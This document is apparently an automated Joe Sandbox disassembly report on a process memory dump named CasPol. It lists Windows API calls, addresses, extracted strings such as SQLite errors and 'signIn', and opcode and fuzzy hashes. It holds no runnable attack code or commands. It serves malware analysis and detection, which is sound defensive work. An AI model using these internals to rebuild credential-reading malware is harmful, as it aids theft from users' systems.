                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                    • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                                                      • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                    • API String ID: 3176057301-2039793938
                                                                                                                                                                                                                    • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                                                    • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                                                    • out of memory, xrefs: 0042F865
                                                                                                                                                                                                                    • database is already attached, xrefs: 0042F721
                                                                                                                                                                                                                    • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                                                    • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                                                    • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                                    • API String ID: 1297977491-2001300268
                                                                                                                                                                                                                    • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                                                                                                                    • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                                                    • String ID: ($d
                                                                                                                                                                                                                    • API String ID: 1140211610-1915259565
                                                                                                                                                                                                                    • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                                                                                                                                                    • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                                                                    • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3015003838-0
                                                                                                                                                                                                                    • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                                    • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 59245283-0
                                                                                                                                                                                                                    • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                                                    • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                                                                                    • free.MSVCRT ref: 004185AC
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2802642348-0
                                                                                                                                                                                                                    • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                                                    • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                                                                                                                                    • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                                                                                                                                    • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                    • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                                    • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                                                      • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00413C4E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                    • String ID: 3A
                                                                                                                                                                                                                    • API String ID: 3300951397-293699754
                                                                                                                                                                                                                    • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                                                    • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                                                    • String ID: AE$.cfg$General$EA
                                                                                                                                                                                                                    • API String ID: 776488737-1622828088
                                                                                                                                                                                                                    • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                                                    • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                                                    • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040D906
                                                                                                                                                                                                                    • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                                                      • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                                                      • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                                                    • String ID: sysdatetimepick32
                                                                                                                                                                                                                    • API String ID: 1028950076-4169760276
                                                                                                                                                                                                                    • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                                                    • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                    • String ID: -journal$-wal
                                                                                                                                                                                                                    • API String ID: 438689982-2894717839
                                                                                                                                                                                                                    • Opcode ID: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
                                                                                                                                                                                                                    • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                                                                    • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                                                                      • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                                                                      • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Item$Dialog$MessageSend
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3975816621-0
                                                                                                                                                                                                                    • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                                    • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                                                                    • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                                                                    • API String ID: 1214746602-2708368587
                                                                                                                                                                                                                    • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                                                    • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2313361498-0
                                                                                                                                                                                                                    • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                                                                                    • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                                                                    • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                                                                      • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2047574939-0
                                                                                                                                                                                                                    • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                                                    • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
